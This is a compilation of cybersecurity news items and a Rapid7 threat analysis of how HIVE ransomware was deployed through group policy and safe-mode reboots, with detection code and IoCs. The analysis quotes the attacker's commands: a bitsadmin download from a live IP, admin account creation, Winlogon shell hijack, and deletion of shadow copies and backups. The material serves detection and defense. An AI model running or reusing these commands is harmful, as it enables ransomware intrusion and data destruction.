The first trending story concerns financial service provider PayPal. Social security numbers of nearly 35,000 users were reportedly exposed in a cyber attack that may have stemmed from a credential stuffing campaign launched by a state-funded actor.

According to an update provided by a source at PayPal, the attack took place on December 6 and was identified at the end of last month. Preliminary inquiries revealed that information such as usernames, dates of birth and individual tax numbers was accessed by the hackers.

On a positive note, none of the siphoned information has been found to have been misused, and the payment systems remained intact with no compromised logins.

All affected customers will be contacted by email and offered an identity theft monitoring service through Equifax for the next 2 years, says a source at the American multinational fintech company.

Second is news about the government of Iran, whose servers were targeted by a threat actor dubbed BackdoorDiplomacy between July and December 2022. Palo Alto Networks' Unit 42 was the first to discover the intrusion and has linked the threat to a Chinese APT group.

Mailchimp, the marketing automation company, is the third to hit the headlines, as its systems fell victim to a social engineering attack that led to a data leak. According to the company's official statement, the leak took place on January 11th, 2023 through the exploitation of a tool used by Mailchimp Customer Support and Account Administration.

On its face, the attack took place when hackers obtained sensitive login details after compromising devices used by an employee and a contractor, leading to the theft of employee credentials.

Cybersecurity Insiders has learned from its sources that the attack led to the leak of information on companies in the cryptocurrency and finance sectors.

Fourth is news about ransomware that is sure to bring smiles to the faces of everyone opposed to the crime and its money-making tactics.

According to an analysis by Chainalysis, a blockchain research firm, ransomware payments have decreased in recent months, a drop of roughly 40% over the past two years from a record-breaking $765 million to $456 million.

This suggests that over the past 16-20 months most victims either did not pay the ransom or openly told the criminals that they would not bow to their demands.

It is unclear whether those victims faced serious repercussions for refusing to pay. Refusal may also mean that the targeted victims were able to recover their encrypted data by other means, such as backups or the free decryption keys that many security firms now offer.

This clearly suggests that the business of spreading file-encrypting malware is no longer lucrative. Whether the criminals will shift their focus to other means or intensify their malware to a new peak, only time will tell.

 

The post Cyber Attack news headlines trending on Google appeared first on Cybersecurity Insiders.

Yum! Brands Inc, the owner of the KFC, Taco Bell and Pizza Hut restaurant chains, was reportedly hit by a ransomware attack, forcing IT staff to close about 300 outlets across the United Kingdom.

As the malware targeted core servers, ordering and billing were badly affected, resulting in the temporary closure of the outlets from the afternoon of Wednesday, January 18th, 2023.

Security measures to contain the spread of the malware are now in place, and the situation is reported to be under control. However, the cybersecurity experts brought in have confirmed that recovery from the incident may take time, and that stores may have to operate manually, with pen and paper, for some days.

Yum! Brands is the second known business in the UK to be hit by a cyber attack within a few days, after the postal service Royal Mail was hit by the Russia-linked LockBit ransomware.

In December 2022, Vice Society targeted school districts and universities in the United Kingdom, and the Play ransomware group was held responsible for disrupting services at cloud service provider Rackspace in the same month.

The only good news is that no customer data was compromised in the incident, as Yum confirmed in its official statement. It also made clear that it has no intention of bowing to the hackers' demands and paying a ransom.

NOTE- In a ransomware incident, hackers first steal information from the targeted systems and then encrypt it, withholding the data until a ransom is paid in cryptocurrency. So only time will tell whether any data theft took place in the attack on Yum! Brands Inc.

 

The post Ransomware attack on Yum Brands Inc closes 300 restaurants in the UK appeared first on Cybersecurity Insiders.

Microsoft issued an update stating that the Cuba ransomware gang has been targeting its Exchange servers by exploiting a critical server-side request forgery (SSRF) vulnerability. Incidentally, the same flaw is also being exploited by the Play ransomware group, which broke into Rackspace's cloud servers via the OWASSRF exploit.

The Windows OS giant says the threat actors were striking the servers after bypassing the ProxyNotShell URL rewrite rules.

Both vulnerabilities now being used by the two ransomware gangs were identified and patched by the Redmond giant at the end of November 2022.

The report is also available to customers of Microsoft 365 Defender and Defender for Endpoint Plan 2, and to business subscribers holding a premium plan.

Coming to the earnings of Cuba ransomware, the notorious gang had struck around 100 targets worldwide by August last year and raked in $60 million in ransoms.

Surprisingly, the gang members are not very active online, which makes them difficult to track down. They launch attack campaigns either at the end of a month or earlier in the year, and end their activities by August every year.

It is unclear whether they go on holiday afterwards or are hired for their capabilities by other gangs.

The FBI issued an advisory in December last year stating that the Cuba gang is targeting US critical infrastructure, having already hit 49 organizations, including power generation and distribution companies and a water utility. As the impact was minimal, the activity went unnoticed by the media but was reported to the Biden administration.

Argentina's Judiciary of Cordoba, the Belgian city of Antwerp, Rackspace and the German H-Hotels are among its known targets so far.

 

The post Cuba Ransomware gang hacking Microsoft Exchange Servers appeared first on Cybersecurity Insiders.

A healthcare provider from Pennsylvania issued a ransomware alert 9 months after the attack, confirming that hackers accessed personal data on its servers and might misuse it at any time. The reason for the delay in informing those affected is yet to be revealed, but sources state that identification, analysis, recovery and mitigation took most of the time, and the non-profit organization made the incident public on January 10th, 2023.

Going into the details, Maternal & Family Health Services (MFHS) released a press statement last weekend saying that a ransomware gang compromised its servers on April 4th of last year, and admitted that the attack could have begun on August 8th, 2021 or even earlier.

Although MFHS did not state the exact number of people affected, estimates are that the information of 461,070 people, including 68 residents of Maine, was accessed in the attack, covering patient, employee and vendor details.

Unidentified people familiar with the matter say that details such as names, addresses, dates of birth, driver's license numbers, social security numbers, health insurance details, medical history, and financial information such as credit and debit card details were accessed by the hackers.

Who was behind the ransomware attack, and whether the US family planning non-profit paid any ransom to recover its data, is yet to be disclosed.

NOTE- Ransomware gangs have a penchant for healthcare-related data, as it fetches a high price when sold on the dark web.

The post Healthcare provider issues ransomware alert after 9 months of attack appeared first on Cybersecurity Insiders.

How malicious actors evade detection and disable defenses for more destructive HIVE Ransomware attacks.

Increasing The Sting of HIVE Ransomware

Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.

Recently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware across many systems within a victim's environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to drop the victim's defenses, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files. These extra steps would make it extremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a certain point in the attack.

Rapid7 has updated existing and added new detections to InsightIDR to defend against these techniques. In this article, we’ll explore the techniques employed by the threat actor, why they’re so effective, and how we’ve updated InsightIDR to protect against them.

What approach did the malicious actor take to prepare the victim's environment?

Initially using Cobalt Strike, the malicious actor retrieved system administration tools and malicious payloads by using the Background Intelligent Transfer Service (BITSAdmin).

"C:\Windows\system32\bitsadmin.exe" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe C:\Users\Public\PsExec.exe

bitsadmin  /transfer debjob /download /priority normal http://79.137.206.47/int.exe C:\Windows\int.exe

The malicious actor then began using the remote process execution tool PsExec to execute batch files (rdp.bat) that made registry changes with reg.exe to enable Remote Desktop (RDP) sessions. This enabled the malicious actor to move laterally throughout the victim's environment using the graphical user interface.

PSEXESVC.exe: C:\Windows\PSEXESVC.exe
└── cmd.exe: C:\Windows\system32\cmd.exe /c ""rdp.bat" "
    └── reg.exe: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

Rapid7 observed the malicious actor adding and changing Group Policy objects for the Active Directory domain to perform the following:

  1. Copy down batch scripts
  2. Execute a batch script (file1.bat), which:
     • Creates an administrator account on the local system
     • Reconfigures the boot configuration data (bcdedit.exe) so that the host will not load any additional drivers or services (i.e. network drivers or endpoint protection)
     • Sets various registry values so that the newly created local administrator automatically logs on by default
     • Changes the Windows shell from Explorer to their malicious script (file2.bat)
     • Reboots the system with the shutdown command
  3. On reboot, the system logs on and executes the shell (file2.bat), which:
     • Extracts the HIVE ransomware payload(s) from an encrypted archive (int.7z) using 7-Zip's console executable (7zr.exe)
     • Executes the ransomware payload (int.exe or int64.exe)

Below are some of the commands the malicious actor was observed executing (with necessary redactions):

xcopy.exe /C/Q/H/Y/Z "\\<REDACTED>\sysvol\<REDACTED>\Policies\{<REDACTED>}\Machine\Scripts\Startup\file1.bat" "C:\windows"
xcopy.exe /C/Q/H/Y/Z "\\<REDACTED>\sysvol\<REDACTED>\Policies\{<REDACTED>}\Machine\Scripts\Startup\file2.bat" "C:\windows"
xcopy.exe /C/Q/H/Y/Z "\\<REDACTED>\sysvol\<REDACTED>\Policies\{<REDACTED>}\Machine\Scripts\Startup\7zr.exe" "C:\windows"
xcopy.exe /C/Q/H/Y/Z "\\<REDACTED>\sysvol\<REDACTED>\Policies\{<REDACTED>}\Machine\Scripts\Startup\int.7z" "C:\windows\"
C:\WINDOWS\SYSTEM32\cmd.exe /c "C:\windows\file1.bat"
net  user <REDACTED> <REDACTED> /add
C:\WINDOWS\system32\net1  user <REDACTED> <REDACTED> /add
net  user <REDACTED> /active:yes
C:\WINDOWS\system32\net1  user <REDACTED> /active:yes
net  localgroup Administrators <REDACTED> /add
C:\WINDOWS\system32\net1  localgroup Administrators <REDACTED> /add
bcdedit  /set {default} safeboot minimal
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "" /f
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "" /f
reg  add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeText /t REG_SZ /d "" /f
reg  add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeCaption /t REG_SZ /d "" /f
reg  add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
reg  add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d <REDACTED> /f
reg  add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d <REDACTED> /f
reg  add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoLogonCount /t REG_DWORD /d 1 /f
reg  add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\windows\file2.bat" /f
shutdown  -r -f -t 10 -c "Computer Will Now Restart In SAFE MODE..."

Rapid7 also observed the malicious actor extracting the HIVE ransomware payload from the encrypted 7-Zip archive (int.7z) using 7-Zip's console application (7zr.exe) and a trivial password (123):

"C:\windows\7zr.exe" x c:\windows\int.7z -p123 -oc:\windows

The malicious actor then manually executed the ransomware (int.exe) once with only the required username:password combination passed to the -u flag. This presumably encrypted the local drive and also all network shares the user had access to:

"C:\Windows\int.exe" -u <REDACTED>:<REDACTED>

The malicious actor also manually executed the 64-bit version of the ransomware (int64.exe) once on a different host with the -no-discovery flag. This likely overrides the default behavior so that network shares are not discovered and encrypted. The -u flag was also passed, with the same username:password values seen on the other host.

C:\Windows\int64.exe  -u <REDACTED>:<REDACTED> -no-discovery

Why is this approach so effective?

Deploying ransomware through Active Directory group policy lets the malicious actor hit every system in the environment for as long as that group policy remains active. In this case, any system that booted while connected to the environment would receive the encrypted archive containing the ransomware, the decompression utility to extract it, the configuration changes, and the order to reboot and execute. This can be especially effective if timed with patch deployments that require a reboot, done at the beginning of the day, or even triggered remotely using PowerShell's Stop-Computer cmdlet.

Storing the ransomware within a password-protected 7-Zip archive (int.7z), even with a password as simple as 123, makes identifying the ransomware on disk or in transit across the network nearly impossible. This makes the retrieval and staging of the malicious actor's payload very difficult for security software or devices (antivirus, web filtering, IDS/IPS and more) to spot. In this case, the malicious actor took care to put only the encrypted copy on the victim's disk and not to extract or execute it until the endpoint's defenses had been fully dropped.

Reconfiguring the default boot behavior to safeboot minimal and then rebooting unloads all but the bare minimum of the Windows operating system. With no additional services, software or drivers loaded, the system is at its most vulnerable. With no active defenses (antivirus or endpoint protection), the system comes up and tries to start its defined shell, which the malicious actor has swapped for a batch script (file2.bat).

It should be noted that in this state there is no way to interact with the system remotely, as no network drivers are loaded. To respond and halt the ransomware, each host must be physically visited and shut down. Priming the host in this way is more effective than the built-in capabilities of the HIVE ransomware, which stop specific defensive services (Windows Defender, etc.) and kill specific processes before encrypting the contents of the drive.

All systems in this state are left automatically logged on as an administrator, which gives anyone with physical access complete control. The system will also continue to boot into safeboot minimal mode by default (again, with no networking) until each system is set back to its original state with a command such as the one below. Bringing the host back online in this state will still execute the malware at logon, and with networking restored its default network spreading behavior will be enabled as well.

bcdedit /deletevalue {default} safeboot

Finally, the malicious actor also manually executed the payload a few times on systems that had not been put into safeboot minimal and rebooted. Systems on which it was executed with only the -u flag actively searched out the network shares they had access to and encrypted their contents. This ensures that only the intended hosts perform network share encryption, so that the hosts rebooted into safeboot minimal do not all flood the network encrypting the same files simultaneously. It also means that the contents of network file shares that are not Windows based (various NAS devices, Linux hosts running Samba) are encrypted even though the payload is never deployed on those hosts. This approach would be extremely destructive both to corporate environments and to home users with network attached storage used for backups. Rapid7 notes that ThreatLocker has reported similar activity in its knowledge base article entitled Preventing BCDEdit From Being Weaponized.

Malware analysis of HIVE sample

Rapid7 observed that the HIVE payload would not execute unless the -u flag was passed. During analysis it was discovered that passing -u asdf:asdf results in that colon-delimited login and password being the credentials provided to the victim for authenticating to the site behind the onion link on the Tor network.

This and other behaviors were previously reported in Microsoft's article Hive Ransomware Gets Upgrades in Rust and by Sophos in the GitHub repository of IoCs accompanying their article Lockbit, Hive, and BlackCat attack automotive supplier in triple ransomware attack. Some flags were noted to exist, but their features were not documented. Rapid7 has analyzed and documented the behaviors of these flags, and discovered two new flags (-timer, -low-key) in the HIVE ransomware samples.

The new flags -t, -timer and --timer cause the malware to wait the specified number of seconds before performing its actions. The other new flags, -low-key and --low-key, cause the ransomware to focus only on encrypting data and skip its pre-encryption tasks: deleting shadow copies (misuse of vssadmin.exe and wmic.exe), deleting backup catalogs (misuse of wbadmin.exe), and disabling Windows Recovery Mode (misuse of bcdedit.exe). These features give the malicious actor more control over how and when the payload executes, and sidestep the common command-line and parent/child process detections that catch most ransomware families.

Fundamentally, the sample's flags distill down to three encryption modules: local, mount and discovery. The local module uses the LookupPrivilegeValueW and AdjustTokenPrivileges Windows API calls on its own process (obtained via GetCurrentProcess and OpenProcessToken) to acquire SeDebugPrivilege. This is presumably needed for its OpenProcess -> OpenProcessToken -> ImpersonateLoggedOnUser call sequence against winlogon.exe and trustedinstaller.exe, which it uses to stop security services and essential processes unless --low-key is passed. ShellExecuteA is also used to launch various Windows binaries (bcdedit.exe, notepad.exe, vssadmin.exe, wbadmin.exe, wmic.exe) to destroy backups and display the ransom note. The mount module uses NetUseEnum to identify the currently mounted network shares and adds them to the list to be encrypted. Lastly, the discovery module uses NetServerEnum to identify available Windows hosts within the domain/workgroup, then NetShareEnum to identify the file shares on each remote host and add them to the list of locations whose files are to be encrypted.

By default, all three modules (local, mount and discovery) are enabled, so all local volumes, mounted shares and any shares that can be enumerated will have their contents encrypted. This effectively ransoms every system in a victim's environment with a single execution of HIVE when run by a privileged user such as a Domain or Enterprise Admin account. Command line flags may be used to change this behavior and invoke one or more of the modules: for instance, --local-only uses only the local module, while --network-only uses the mount and discovery modules.

| Flag | Description |
| --- | --- |
| -u | <username>:<password> for login to the hivecust*.onion domain, identifying the victim |
| -da | <domainname>\<username>:<password>: use different credentials when doing network spreading. Likely shorthand for "Domain Admin". Calls LogonUserW, triggering a 4624(S) Type 3 (network) logon event, then calls ImpersonateLoggedOnUser with the token returned by LogonUserW. |
| -low-key, --low-key | Encrypt files and open the ransom note (if the local filesystem is to be encrypted), but do not spawn other binaries (vssadmin.exe, WMIC.exe, wbadmin.exe, bcdedit.exe) for further destructive impact. Also skips enumeration and stopping of antivirus software. |
| -no-local, --no-local | Do not encrypt local files |
| -no-mounted, --no-mounted | Do not encrypt mounted filesystems |
| -no-discovery, --no-discovery | Do not enumerate or encrypt file shares on the network |
| -local-only, --local-only | Only encrypt local file systems |
| -network-only, --network-only | Only encrypt file shares on the network |
| -explicit-only, --explicit-only | Only encrypt files in the specified path |
| -min-size, --min-size | Only encrypt files greater than or equal to the specified number of bytes |
| -t, -timer, --timer | Do not encrypt files until after the specified number of seconds |

By default, the ransomware will execute the following child processes with the following arguments:

Use of vssadmin.exe to delete volume shadow copies, removing the unencrypted copies of the files being ransomed:

"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet

Use of wmic.exe to issue a call that likewise deletes all shadow copies, removing the unencrypted copies of the files being ransomed:

"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete

Use of wbadmin.exe to delete backup catalogs:

"C:\Windows\System32\wbadmin.exe" delete systemstatebackup

"C:\Windows\System32\wbadmin.exe" delete catalog -quiet

"C:\Windows\System32\wbadmin.exe" delete systemstatebackup -keepVersions:3

Use of bcdedit.exe to disable automatic repair and ignore errors when booting:

"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled No

"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures

Lastly, notepad.exe is opened to display the ransom note, with instructions to the victim on how to pay:

"C:\Windows\System32\notepad.exe" C:\HOW_TO_DECRYPT.txt
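As an added example (not code from the Rapid7 article or its tooling), the following applies the flag semantics documented above to a HIVE command line captured in process telemetry, so a responder can see which encryption modules (local, mount, discovery) that execution ran and whether the backup-destroying child processes listed above are expected on that host. The article does not say how contradictory flags combine; letting the *-only flags override the -no-* flags is this example's assumption, as are the host names.

```python
"""Scope one HIVE execution from its observed command line (added example)."""
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Child processes the article lists as HIVE's default pre-encryption actions;
# -low-key suppresses all of them.
PRE_ENCRYPTION_CHILDREN = [
    "vssadmin.exe delete shadows /all /quiet",
    "WMIC.exe shadowcopy delete",
    "wbadmin.exe delete systemstatebackup",
    "wbadmin.exe delete catalog -quiet",
    "wbadmin.exe delete systemstatebackup -keepVersions:3",
    "bcdedit.exe /set {default} recoveryenabled No",
    "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
]

# Flags that consume the following argument as their value.
VALUE_FLAGS = {"u", "da", "explicit-only", "min-size", "t", "timer"}


@dataclass
class HiveScope:
    local: bool = True        # encrypt local volumes
    mount: bool = True        # encrypt locally mounted shares (NetUseEnum)
    discovery: bool = True    # enumerate and encrypt domain shares (NetServerEnum/NetShareEnum)
    low_key: bool = False
    delay_seconds: int = 0
    has_credentials: bool = False                 # -u present (payload will not run without it)
    spreading_credentials: Optional[str] = None   # -da value, if supplied
    explicit_path: Optional[str] = None
    min_size: Optional[int] = None

    def modules(self) -> List[str]:
        return [m for m, on in (("local", self.local), ("mount", self.mount),
                                ("discovery", self.discovery)) if on]

    def expected_children(self) -> List[str]:
        return [] if self.low_key else list(PRE_ENCRYPTION_CHILDREN)


def scope_hive_cmdline(cmdline: str) -> HiveScope:
    """Derive the expected behaviour of a HIVE run from its command line."""
    argv = shlex.split(cmdline, posix=False)[1:]   # posix=False keeps backslashes intact
    s, only, i = HiveScope(), None, 0
    while i < len(argv):
        flag = argv[i].lstrip("-").lower()         # -flag and --flag are equivalent
        value = argv[i + 1] if flag in VALUE_FLAGS and i + 1 < len(argv) else None
        if flag == "u":
            s.has_credentials = True
        elif flag == "da":
            s.spreading_credentials = value
        elif flag == "low-key":
            s.low_key = True
        elif flag == "no-local":
            s.local = False
        elif flag == "no-mounted":
            s.mount = False
        elif flag == "no-discovery":
            s.discovery = False
        elif flag in ("local-only", "network-only"):
            only = flag
        elif flag == "explicit-only":
            s.explicit_path = value
        elif flag == "min-size" and value is not None:
            s.min_size = int(value)
        elif flag in ("t", "timer") and value is not None:
            s.delay_seconds = int(value)
        i += 2 if value is not None else 1
    # Assumption: an *-only flag wins over any -no-* flags on the same line.
    if only == "local-only":
        s.local, s.mount, s.discovery = True, False, False
    elif only == "network-only":
        s.local, s.mount, s.discovery = False, True, True
    return s


# Constructed from the two executions quoted in the article; host names are invented.
OBSERVED: Dict[str, str] = {
    "HOST-A": r'"C:\Windows\int.exe" -u <REDACTED>:<REDACTED>',
    "HOST-B": r"C:\Windows\int64.exe -u <REDACTED>:<REDACTED> -no-discovery",
}


def triage(observed: Dict[str, str]) -> Dict[str, Tuple[List[str], int]]:
    """host -> (encryption modules that ran, number of backup-destroying children expected)."""
    return {host: (sc.modules(), len(sc.expected_children()))
            for host, sc in ((h, scope_hive_cmdline(c)) for h, c in observed.items())}


if __name__ == "__main__":
    for host, (mods, children) in triage(OBSERVED).items():
        print(f"{host}: modules={mods} expected pre-encryption children={children}")
```

For HOST-A this reports all three modules (so reachable network shares were in scope from that host), while HOST-B ran only local and mount; both hosts should show the vssadmin/wmic/wbadmin/bcdedit child processes unless -low-key was present.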

Rapid7 Protection

Rapid7 has detections in place within InsightIDR, through the Insight Agent, to detect this type of ransomware activity. However, because the malicious actor reboots into the safeboot minimal state, neither endpoint protection software nor networking is running while the endpoint is executing the ransomware.

So, identifying the actions of a malicious actor before ransomware is deployed is crucial to preventing the attack. In other words, it is essential to identify malicious actors within the environment and eject them before the ransomware payload is dropped.

The following detections are now available in InsightIDR to identify this attacker behavior.

  • Attacker Technique - Auto Logon Count Set Once
  • Attacker Technique - Potential Process Hollowing To DLLHost
  • Attacker Technique - Shutdown With Message Used By Malicious Actors
  • Attacker Technique - URL Passed To BitsAdmin
  • Lateral Movement - Enable RDP via reg.exe
  • Suspicious Process - BCDEdit Enabling Safeboot
  • Suspicious Process - Boot Configuration Data Editor Activity
  • Suspicious Process - DLLHost With No Arguments Spawns Process
  • Suspicious Process - Rundll32.exe With No Arguments Spawns Process
  • Suspicious Process - ShadowCopy Delete Passed To WMIC
  • Suspicious Process - Volume Shadow Service Delete Shadow Copies
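The block below is an added example, not Rapid7's code or the InsightIDR rule logic. It runs simple process-creation rules over constructed telemetry modelled on the command lines quoted earlier (the group policy staging script and the ransomware's own child processes) and correlates per host, so that a machine on which the safeboot, Winlogon Shell and AutoLogonCount changes all appear is flagged before its next reboot. Rule names follow the detections listed above, but each regex is this example's own approximation; host names and the download address are placeholders.

```python
"""Process-telemetry detections for the HIVE pre-deployment chain (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str      # path of the created process
    cmdline: str    # full command line as logged


def exe_name(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# (rule name, created executable, command-line pattern)
RULES: List[Tuple[str, str, str]] = [
    ("URL Passed To BitsAdmin", "bitsadmin.exe", r"/transfer\b.*\bhttps?://"),
    ("Enable RDP via reg.exe", "reg.exe",
     r"\badd\b.*Terminal Server.*fDenyTSConnections.*/d\s+0\b"),
    ("BCDEdit Enabling Safeboot", "bcdedit.exe", r"/set\b.*\bsafeboot\b"),
    ("Auto Logon Count Set Once", "reg.exe", r"Winlogon.*AutoLogonCount.*/d\s+1\b"),
    # Winlogon\Shell pointing anywhere but explorer.exe (file2.bat in the article).
    ("Winlogon Shell Replaced", "reg.exe", r"Winlogon.*/v\s+Shell\b(?!.*explorer\.exe)"),
    ("Shutdown With Message", "shutdown.exe", r'(^|\s)[-/]r\b.*(^|\s)[-/]c\s+"'),
    ("VSS Delete Shadow Copies", "vssadmin.exe", r"\bdelete\s+shadows\b"),
    ("ShadowCopy Delete Passed To WMIC", "wmic.exe", r"\bshadowcopy\s+delete\b"),
    ("wbadmin Backup Catalog Deletion", "wbadmin.exe",
     r"\bdelete\s+(catalog|systemstatebackup)\b"),
    ("BCDEdit Disabling Recovery", "bcdedit.exe",
     r"recoveryenabled\s+no\b|bootstatuspolicy\s+ignoreallfailures"),
]

# Seen together on one host, these three mean the safe-mode staging is complete:
# the next reboot runs the attacker's shell with no network and no EDR loaded.
STAGING_CHAIN: Set[str] = {
    "BCDEdit Enabling Safeboot", "Winlogon Shell Replaced", "Auto Logon Count Set Once",
}


def match_rules(e: ProcEvent) -> List[str]:
    name = exe_name(e.image)
    return [rule for rule, exe, pat in RULES
            if name == exe and re.search(pat, e.cmdline, re.IGNORECASE)]


def analyse(events: List[ProcEvent]) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Return (host, rule) hits and the hosts where the full staging chain was seen."""
    hits: List[Tuple[str, str]] = []
    per_host: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        for rule in match_rules(e):
            hits.append((e.host, rule))
            per_host[e.host].add(rule)
    staged = sorted(h for h, rules in per_host.items() if STAGING_CHAIN <= rules)
    return hits, staged


# Constructed sample telemetry modelled on the article's command lines; the
# download address is a documentation placeholder, not the article's IoC.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\system32\bitsadmin.exe",
              r"bitsadmin /transfer debjob /download /priority normal "
              r"http://198.51.100.7/int.exe C:\Windows\int.exe"),
    ProcEvent("WS01", r"C:\Windows\system32\reg.exe",
              r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" '
              r'/v "fDenyTSConnections" /t REG_DWORD /d 0 /f'),
    ProcEvent("WS01", r"C:\Windows\system32\bcdedit.exe",
              r"bcdedit /set {default} safeboot minimal"),
    ProcEvent("WS01", r"C:\Windows\system32\reg.exe",
              r'reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" '
              r"/v AutoLogonCount /t REG_DWORD /d 1 /f"),
    ProcEvent("WS01", r"C:\Windows\system32\reg.exe",
              r'reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" '
              r'/v Shell /t REG_SZ /d "C:\windows\file2.bat" /f'),
    ProcEvent("WS01", r"C:\Windows\system32\shutdown.exe",
              r'shutdown -r -f -t 10 -c "Computer Will Now Restart In SAFE MODE..."'),
    # Benign activity on WS02: an admin restoring Explorer as the shell and a plain
    # reboot must not trip the Shell or shutdown rules.
    ProcEvent("WS02", r"C:\Windows\system32\reg.exe",
              r'reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" '
              r"/v Shell /t REG_SZ /d explorer.exe /f"),
    ProcEvent("WS02", r"C:\Windows\system32\shutdown.exe", r"shutdown /r /t 0"),
    ProcEvent("FS01", r"C:\Windows\System32\vssadmin.exe",
              r'"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet'),
]


if __name__ == "__main__":
    found, staged_hosts = analyse(SAMPLE_EVENTS)
    for host, rule in found:
        print(f"{host}: {rule}")
    print("safe-mode staging complete on:", staged_hosts)
```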

IOC's

| Type | Value |
| --- | --- |
| Registry Key | HKLM\System\CurrentControlSet\Control\Terminal Server |
| Registry Value | Type: DWORD, Name: fDenyTSConnections, Value: 0 |
| Filename | rdp.bat |
| Filename | file1.bat |
| Filename | file2.bat |
| Filename | int.7z |
| Filename | int64.exe |
| MD5 (int64.exe) | 89ea20880a6aae021940a8166ff85ee8 |
| SHA1 (int64.exe) | 4af769fb3109c754bc879201c61242217a674a2e |
| SHA256 (int64.exe) | 067af912ceddb1ea181490f2b3b5a323efcac61c82207833cda70c21c84460cb |
| Filename | int.exe |
| MD5 (int.exe) | 8fba0d57696ccf672ddcea4ba4d0e885 |
| SHA1 (int.exe) | 31097a7f91d182755fc63ebf023bff54cda5ae9c |
| SHA256 (int.exe) | 184a0f96cef09408b192767b405b0266403c9ec429945c1a78703f04f18c7416 |


MITRE ATT&CK

Techniques

T1021 - Remote Services
T1021.001 - Remote Desktop Protocol
T1021.002 - SMB/Windows Admin Shares
T1027 - Obfuscated Files Or Information
T1027.009 - Embedded Payloads
T1037 - Boot Or Logon Initialization Scripts
T1037.003 - Network Logon Script
T1059 - Command And Scripting Interpreter
T1059.001 - PowerShell
T1059.003 - Windows Command Shell
T1070 - Indicator Removal
T1080 - Taint Shared Content
T1105 - Ingress Tool Transfer
T1112 - Modify Registry
T1135 - Network Share Discovery
T1136 - Create Account
T1136.001 - Local Account
T1140 - Deobfuscate/Decode Files Or Information
T1197 - BITS Jobs
T1480 - Execution Guardrails
T1484 - Domain Policy Modification
T1484.001 - Group Policy Modification
T1485 - Data Destruction
T1486 - Data Encrypted For Impact
T1489 - Service Stop
T1490 - Inhibit System Recovery
T1529 - System Shutdown/Reboot
T1547 - Boot Or Logon Autostart Execution
T1560 - Archive Collected Data
T1560.001 - Archive Via Utility
T1562 - Impair Defenses
T1562.001 - Disable Or Modify Tools
T1562.009 - Safe Mode Boot
T1570 - Lateral Tool Transfer

Software

S0029 - PSExec
S0075 - Reg
S0190 - BITSAdmin
S0154 - Cobalt Strike

By Doron Pinhas, Chief Technology Officer, Continuity

2022 clearly demonstrated that attacks on data represent the greatest cyber-threat organizations face. The attack pace not only continued, it accelerated. Notable data breaches took place at Microsoft, News Corp., the Red Cross, FlexBooker, Cash App, GiveSendGo, and several crypto firms.

Many of these attacks took advantage of known vulnerabilities and security misconfigurations in storage and backup systems. Continuity exposed the extent of the problem two years ago: on average, enterprise storage devices have 16 security misconfigurations, of which three are critical. And backup and storage systems are rife with unpatched CVEs.

To make matters worse, the political climate is likely to breed more nation-state sponsored cyberattacks. Job dissatisfaction and surging unemployment across the technology sector is likely to spur more insider threats. Organizations are being confronted on all sides by cyber-danger.

Here are our top 4 predictions on how this will play out in 2023:

  1. More Data Attacks, Greater Sophistication, Bigger Monetary Losses

There is an old saying that generals tend to fight the last battle or the last war, i.e., they use tactics that would have been best suited to an earlier conflict. The U.S., for example, used World War II and Korean War tactics in Vietnam and fared poorly against the guerrilla approach of the Vietcong.

Similarly, in cybersecurity, enterprises typically shore themselves up against last year's strategies and attack vectors. By the time they adjust their processes, beef up their defenses, and add new layers of security, they find themselves battling more virulent ransomware strains and cyber-scams. That is why it has been clear for a couple of years that organizations are always playing catch-up to cybercriminal gangs. Hence the coming year will inevitably see more data attacks of greater sophistication, resulting in ever higher monetary and business losses.

This brings about a vicious circle. As criminals enjoy more success, they reinvest some of the profits in better technology, more powerful systems, and better organized gangs. Thus, we are seeing the appearance of developments such as ransomware-as-a-service and the evolution of a cybercrime supply chain composed of distinct elements, each performing specialized functions that dovetail together into the eventual heist.

  2. Slow Gains on Storage and Backup Security

